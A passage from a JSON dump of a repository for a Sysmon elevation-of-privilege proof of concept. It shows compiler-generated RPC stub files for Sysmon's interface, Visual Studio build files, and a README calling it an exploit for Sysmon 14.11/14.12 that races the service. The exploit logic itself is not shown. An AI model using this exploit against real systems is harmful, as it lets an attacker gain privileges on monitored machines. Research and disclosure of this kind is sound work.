IsIntrepreted, HasReturn, HasExtensions */\r\n        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 1 /* 0x1 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* long */      /* parameter long */\r\n        &__midl_frag5,\r\n        { \r\n        /* long */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [out], IsReturn, Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag1_t __midl_frag1 =\r\n(NDR64_UINT32) 0 /* 0x0 */;\r\n\r\n\r\n#include \"poppack.h\"\r\n\r\n\r\nstatic const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =\r\n    {\r\n    &__midl_frag2,\r\n    &__midl_frag4\r\n    };\r\n\r\n\r\nstatic const MIDL_STUB_DESC DefaultIfName_StubDesc = \r\n    {\r\n    (void *)& DefaultIfName___RpcClientInterface,\r\n    MIDL_user_allocate,\r\n    MIDL_user_free,\r\n    &DefaultIfName__MIDL_AutoBindHandle,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    1, /* -error bounds_check flag */\r\n    0x60001, /* Ndr library version */\r\n   
 0,\r\n    0x801026e, /* MIDL Version 8.1.622 */\r\n    0,\r\n    0,\r\n    0,  /* notify & notify_flag routine table */\r\n    0x2000001, /* MIDL flag */\r\n    0, /* cs routines */\r\n    (void *)& DefaultIfName_ProxyInfo,   /* proxy/server info */\r\n    0\r\n    };\r\n\r\nstatic const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = \r\n    {\r\n    {\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    0,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    ,{\r\n    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},\r\n    0,\r\n    0 ,\r\n    (unsigned short *) DefaultIfName_Ndr64ProcTable,\r\n    0,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    };\r\n\r\nstatic const MIDL_STUBLESS_PROXY_INFO DefaultIfName_ProxyInfo =\r\n    {\r\n    &DefaultIfName_StubDesc,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    (RPC_SYNTAX_IDENTIFIER*)&_RpcTransferSyntax,\r\n    2,\r\n    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo\r\n    \r\n    };\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(pop)\r\n#endif\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n"
  },
  {
    "path": "v1/SysmonEoP/sysmon_h.h",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n\r\n\r\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\r\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\r\n#define __REQUIRED_RPCNDR_H_VERSION__ 500\r\n#endif\r\n\r\n#include \"rpc.h\"\r\n#include \"rpcndr.h\"\r\n\r\n#ifndef __RPCNDR_H_VERSION__\r\n#error this stub requires an updated version of <rpcndr.h>\r\n#endif /* __RPCNDR_H_VERSION__ */\r\n\r\n\r\n#ifndef __sysmon_h_h__\r\n#define __sysmon_h_h__\r\n\r\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\r\n#pragma once\r\n#endif\r\n\r\n/* Forward Declarations */ \r\n\r\n#ifdef __cplusplus\r\nextern \"C\"{\r\n#endif \r\n\r\n\r\n#ifndef __DefaultIfName_INTERFACE_DEFINED__\r\n#define __DefaultIfName_INTERFACE_DEFINED__\r\n\r\n/* interface DefaultIfName */\r\n/* [version][uuid] */ \r\n\r\nlong Proc0( \r\n    /* [in] */ handle_t IDL_handle);\r\n\r\nvoid Proc1( \r\n    /* [in] */ handle_t IDL_handle,\r\n    /* [in] */ long arg_0,\r\n    /* [string][in] */ wchar_t *arg_1);\r\n\r\n\r\n\r\nextern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;\r\nextern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;\r\n#endif /* __DefaultIfName_INTERFACE_DEFINED__ */\r\n\r\n/* Additional Prototypes for ALL interfaces */\r\n\r\n/* end of Additional Prototypes */\r\n\r\n#ifdef __cplusplus\r\n}\r\n#endif\r\n\r\n#endif\r\n\r\n\r\n"
  },
  {
    "path": "v1/SysmonEoP/sysmon_s.c",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(push)\r\n#endif\r\n\r\n#pragma warning( disable: 4211 )  /* redefine extern to static */\r\n#pragma warning( disable: 4232 )  /* dllimport identity*/\r\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\r\n\r\n#include <string.h>\r\n#include \"sysmon_h.h\"\r\n\r\n#define TYPE_FORMAT_STRING_SIZE   7                                 \r\n#define PROC_FORMAT_STRING_SIZE   79                                \r\n#define EXPR_FORMAT_STRING_SIZE   1                                 \r\n#define TRANSMIT_AS_TABLE_SIZE    0            \r\n#define WIRE_MARSHAL_TABLE_SIZE   0            \r\n\r\ntypedef struct _sysmon_MIDL_TYPE_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_TYPE_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_PROC_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_PROC_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_EXPR_FORMAT_STRING\r\n    {\r\n    long          Pad;\r\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_EXPR_FORMAT_STRING;\r\n\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
\r\n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = \r\n{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};\r\n\r\n\r\nextern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;\r\nextern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;\r\nextern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;\r\n\r\n/* Standard interface: DefaultIfName, ver. 1.0,\r\n   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */\r\n\r\n\r\nextern const MIDL_SERVER_INFO DefaultIfName_ServerInfo;\r\n\r\nextern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable;\r\n\r\nstatic const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface =\r\n    {\r\n    sizeof(RPC_SERVER_INTERFACE),\r\n    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,\r\n    0,\r\n    0,\r\n    0,\r\n    &DefaultIfName_ServerInfo,\r\n    0x06000000\r\n    };\r\nRPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface;\r\n\r\nextern const MIDL_STUB_DESC DefaultIfName_StubDesc;\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\nstatic const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =\r\n    {\r\n        0,\r\n        {\r\n\r\n\t/* Procedure Proc0 */\r\n\r\n\t\t\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  8 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 14 */\tNdrFcShort( 0x0 ),\t/* 0 
*/\r\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 18 */\t0x44,\t\t/* Oi2 Flags:  has return, has ext, */\r\n\t\t\t0x1,\t\t/* 1 */\r\n/* 20 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Return value */\r\n\r\n/* 30 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\r\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 34 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Procedure Proc1 */\r\n\r\n/* 36 */\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/* 38 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/* 42 */\tNdrFcShort( 0x1 ),\t/* 1 */\r\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\r\n/* 46 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 48 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 50 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 52 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 54 */\t0x42,\t\t/* Oi2 Flags:  clt must size, has ext, */\r\n\t\t\t0x2,\t\t/* 2 */\r\n/* 56 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 58 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 62 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 64 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Parameter arg_0 */\r\n\r\n/* 66 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\r\n/* 68 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 70 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Parameter arg_1 */\r\n\r\n/* 72 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\r\n/* 74 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 76 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =\r\n    
{\r\n        0,\r\n        {\r\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  2 */\t\r\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\r\n/*  4 */\t\r\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\r\n\t\t\t0x5c,\t\t/* FC_PAD */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const unsigned short DefaultIfName_FormatStringOffsetTable[] =\r\n    {\r\n    0,\r\n    36\r\n    };\r\n\r\n\r\nstatic const RPC_DISPATCH_FUNCTION DefaultIfName_table[] =\r\n    {\r\n    NdrServerCall2,\r\n    NdrServerCall2,\r\n    0\r\n    };\r\nstatic const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable = \r\n    {\r\n    2,\r\n    (RPC_DISPATCH_FUNCTION*)DefaultIfName_table\r\n    };\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\n\r\n#include \"ndr64types.h\"\r\n#include \"pshpack8.h\"\r\n\r\n\r\ntypedef \r\nstruct _NDR64_CONFORMANT_STRING_FORMAT\r\n__midl_frag7_t;\r\nextern const __midl_frag7_t __midl_frag7;\r\n\r\ntypedef \r\nstruct _NDR64_POINTER_FORMAT\r\n__midl_frag6_t;\r\nextern const __midl_frag6_t __midl_frag6;\r\n\r\ntypedef \r\nNDR64_FORMAT_CHAR\r\n__midl_frag5_t;\r\nextern const __midl_frag5_t __midl_frag5;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct 
_NDR64_PARAM_FORMAT frag3;\r\n    struct _NDR64_PARAM_FORMAT frag4;\r\n}\r\n__midl_frag4_t;\r\nextern const __midl_frag4_t __midl_frag4;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n}\r\n__midl_frag2_t;\r\nextern const __midl_frag2_t __midl_frag2;\r\n\r\ntypedef \r\nNDR64_FORMAT_UINT32\r\n__midl_frag1_t;\r\nextern const __midl_frag1_t __midl_frag1;\r\n\r\nstatic const __midl_frag7_t __midl_frag7 =\r\n{ \r\n/* *wchar_t */\r\n    { \r\n    /* *wchar_t */\r\n        0x64,    /* FC64_CONF_WCHAR_STRING */\r\n        { \r\n        /* *wchar_t */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0\r\n        },\r\n        (NDR64_UINT16) 2 /* 0x2 */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag6_t __midl_frag6 =\r\n{ \r\n/* *wchar_t */\r\n    0x20,    /* FC64_RP */\r\n    (NDR64_UINT8) 0 /* 0x0 */,\r\n    (NDR64_UINT16) 0 /* 0x0 */,\r\n    &__midl_frag7\r\n};\r\n\r\nstatic const __midl_frag5_t __midl_frag5 =\r\n0x5    /* FC64_INT32 */;\r\n\r\nstatic const __midl_frag4_t __midl_frag4 =\r\n{ \r\n/* Proc1 */\r\n    { \r\n    /* Proc1 */      /* procedure Proc1 */\r\n        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */\r\n        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 2 /* 0x2 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n     
       (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* arg_0 */      /* parameter arg_0 */\r\n        &__midl_frag5,\r\n        { \r\n        /* arg_0 */\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [in], Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    },\r\n    { \r\n    /* arg_1 */      /* parameter arg_1 */\r\n        &__midl_frag7,\r\n        { \r\n        /* arg_1 */\r\n            1,\r\n            1,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* MustSize, MustFree, [in], SimpleRef */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        16 /* 0x10 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag2_t __midl_frag2 =\r\n{ \r\n/* Proc0 */\r\n    { \r\n    /* Proc0 */      /* procedure Proc0 */\r\n        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */\r\n        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 1 /* 0x1 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    
/* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* long */      /* parameter long */\r\n        &__midl_frag5,\r\n        { \r\n        /* long */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [out], IsReturn, Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag1_t __midl_frag1 =\r\n(NDR64_UINT32) 0 /* 0x0 */;\r\n\r\n\r\n#include \"poppack.h\"\r\n\r\n\r\nstatic const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =\r\n    {\r\n    &__midl_frag2,\r\n    &__midl_frag4\r\n    };\r\n\r\n\r\nstatic const MIDL_STUB_DESC DefaultIfName_StubDesc = \r\n    {\r\n    (void *)& DefaultIfName___RpcServerInterface,\r\n    MIDL_user_allocate,\r\n    MIDL_user_free,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    1, /* -error bounds_check flag */\r\n    0x60001, /* Ndr library version */\r\n    0,\r\n    0x801026e, /* MIDL Version 8.1.622 */\r\n    0,\r\n    0,\r\n    0,  /* notify & notify_flag routine table */\r\n    0x2000001, /* MIDL flag */\r\n    0, /* cs routines */\r\n    (void *)& DefaultIfName_ServerInfo,   /* proxy/server info */\r\n    0\r\n    };\r\n\r\nstatic const RPC_DISPATCH_FUNCTION DefaultIfName_NDR64__table[] =\r\n    {\r\n    NdrServerCallAll,\r\n    NdrServerCallAll,\r\n    0\r\n    };\r\nstatic const RPC_DISPATCH_TABLE DefaultIfName_NDR64__v1_0_DispatchTable = \r\n    {\r\n    2,\r\n    
(RPC_DISPATCH_FUNCTION*)DefaultIfName_NDR64__table\r\n    };\r\n\r\nstatic const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = \r\n    {\r\n    {\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    ,{\r\n    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_NDR64__v1_0_DispatchTable,\r\n    0 ,\r\n    (unsigned short *) DefaultIfName_Ndr64ProcTable,\r\n    0,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    };\r\n\r\n\r\nstatic const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] = \r\n    {\r\n    (SERVER_ROUTINE)Proc0,\r\n    (SERVER_ROUTINE)Proc1\r\n    };\r\n\r\nstatic const MIDL_SERVER_INFO DefaultIfName_ServerInfo = \r\n    {\r\n    &DefaultIfName_StubDesc,\r\n    DefaultIfName_ServerRoutineTable,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    (unsigned short *) DefaultIfName_FormatStringOffsetTable,\r\n    0,\r\n    (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax,\r\n    2,\r\n    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo\r\n    };\r\n#if _MSC_VER >= 1200\r\n#pragma warning(pop)\r\n#endif\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n"
  },
  {
    "path": "v2/README.md",
    "content": "Exploit for versions 14.11/14.12 (it also works on versions below 14.11, but is less stable there, as we need to race with Sysmon).\n\n![PoC](poc.PNG)\n"
  },
  {
    "path": "v2/SysmonEoP/SysmonEOP.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.30717.126\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"SysmonEOP\", \"SysmonEOP.vcxproj\", \"{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x64.Build.0 = Release|x64\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{FAC6A4F5-2E86-4EF0-A787-669B2A2F28AF}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {EA809E7C-ABAC-45B5-BE5B-2F48BFC601DA}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "v2/SysmonEoP/SysmonEOP.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <ProjectGuid>{fac6a4f5-2e86-4ef0-a787-669b2a2f28af}</ProjectGuid>\r\n    <RootNamespace>SysmonEOP</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    